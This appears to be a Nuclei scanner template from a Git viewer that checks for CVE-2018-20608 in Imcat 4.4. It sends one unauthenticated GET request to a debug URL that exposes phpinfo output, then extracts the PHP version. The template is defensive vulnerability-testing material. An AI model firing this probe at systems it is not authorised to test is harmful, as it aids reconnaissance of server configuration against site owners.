nuclei-templates/http/cves/2018/CVE-2018-20608.yaml

47 lines
1.1 KiB
YAML
Raw Normal View History

2023-07-25 17:43:09 +00:00
id: CVE-2018-20608
info:
name: Imcat 4.4 - Phpinfo Configuration
author: ritikchaddha
severity: high
description: Imcat 4.4 allows remote attackers to read phpinfo output via the root/tools/adbug/binfo.php?phpinfo1 URI.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-20608
classification:
2023-08-31 11:46:18 +00:00
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
2023-07-25 17:43:09 +00:00
cve-id: CVE-2018-20608
2023-08-31 11:46:18 +00:00
cwe-id: CWE-200
epss-score: 0.03654
cpe: cpe:2.3:a:txjia:imcat:4.4:*:*:*:*:*:*:*
epss-percentile: 0.90503
2023-07-25 17:43:09 +00:00
metadata:
max-request: 1
2023-08-31 11:46:18 +00:00
vendor: txjia
product: imcat
2023-07-25 17:43:09 +00:00
tags: cve,cve2018,imcat,phpinfo,config
http:
- method: GET
path:
- "{{BaseURL}}/imcat/root/tools/adbug/binfo.php?phpinfo1"
matchers-condition: and
matchers:
- type: word
words:
- "PHP Extension"
- "PHP Version"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
group: 1
regex:
- '>PHP Version <\/td><td class="v">([0-9.]+)'
part: body